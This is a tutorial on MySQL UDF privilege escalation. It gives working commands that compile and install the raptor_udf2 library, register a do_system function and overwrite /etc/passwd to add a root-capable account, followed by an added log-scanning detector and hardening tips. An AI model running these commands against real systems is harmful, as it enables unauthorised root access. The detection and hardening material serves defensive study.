Priv Esc with MySQL UDF

UDF (User Defined Functions): relational database systems sometimes let users create their own functions. These can be written in any programming language and can be used to run malicious commands on the underlying OS.

What's the requirement?

  • The target is running a SQL server as root without a password (or with a password that can be found in config.php)

gcc -g -c 1518.c -o raptor  #compile the exploit code
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor -lc        #create the shared library (so)
use mysql;
create table foo(line blob);

insert into foo values(load_file('/tmp/raptor_udf2.so')); 
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

Once you have confirmed that you actually have root privileges (for example, by being able to read the /etc/shadow file), you can create your own passwd file (adding an account with cp).

select do_system('cat /etc/passwd > /tmp/passfile; chown j0hn j0hn /tmp/passfile');
#copy the contents of passfile to your own machine and name it passwd
openssl passwd -crypt -salt gori gorigori #creates a crypt hash of the password gorigori (salt gori) for the new account's entry in the passwd file
#transfer the new password file to the target machine 
select do_system('cp /tmp/passwd /etc/passwd');
#confirm the password has been added.
su gorigori
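
On the defensive side, the statement sequence above is distinctive in a MySQL general query log. The following is an added example, not part of the original page: it flags a shared library read with load_file, written with INTO DUMPFILE, registered with CREATE FUNCTION ... SONAME, and then any later call to the registered function. The log layout, the sample lines and the rule names are constructed assumptions.

```python
import re

# Assumed layout: timestamp, connection id, command type, statement text.
LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")
LOAD_SO = re.compile(r"load_file\s*\(\s*'([^']+\.so)'", re.I)
DUMP_SO = re.compile(r"into\s+dumpfile\s+'([^']+\.so)'", re.I)
CREATE_UDF = re.compile(
    r"create\s+(?:aggregate\s+)?function\s+`?(\w+)`?\s+returns\s+\w+\s+soname\s+'([^']+)'",
    re.I,
)


def scan(lines):
    """Return (timestamp, connection id, rule, detail) for each suspicious statement."""
    findings, udfs = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a Query entry (Connect, Quit, header lines, ...)
        ts, conn, sql = m["ts"], int(m["conn"]), m["sql"]
        if (hit := LOAD_SO.search(sql)):
            findings.append((ts, conn, "library_read_via_load_file", hit[1]))
        if (hit := DUMP_SO.search(sql)):
            findings.append((ts, conn, "library_written_via_dumpfile", hit[1]))
        if (hit := CREATE_UDF.search(sql)):
            udfs.add(hit[1].lower())  # remember the name to catch later calls
            findings.append((ts, conn, "udf_registered", f"{hit[1]} -> {hit[2]}"))
            continue
        for name in udfs:
            if re.search(rf"\b{re.escape(name)}\s*\(", sql, re.I):
                findings.append((ts, conn, "udf_called", name))
    return findings


# Constructed sample log built from the statements on this page, not from a real host.
SAMPLE_LOG = """\
2024-01-01T10:00:01.000000Z\t    7 Connect\troot@localhost on  using Socket
2024-01-01T10:00:02.000000Z\t    7 Query\tcreate table foo(line blob)
2024-01-01T10:00:03.000000Z\t    7 Query\tinsert into foo values(load_file('/tmp/raptor_udf2.so'))
2024-01-01T10:00:04.000000Z\t    7 Query\tselect * from foo into dumpfile '/usr/lib/raptor_udf2.so'
2024-01-01T10:00:05.000000Z\t    7 Query\tcreate function do_system returns integer soname 'raptor_udf2.so'
2024-01-01T10:00:06.000000Z\t    7 Query\tselect do_system('cp /tmp/passwd /etc/passwd')
2024-01-01T10:00:07.000000Z\t    9 Query\tselect count(*) from orders
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

The general query log has to be enabled for these statements to be recorded. The `secure_file_priv` setting restricts `load_file()` and `INTO DUMPFILE`, and running mysqld under an unprivileged account keeps a loaded UDF from executing as root.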
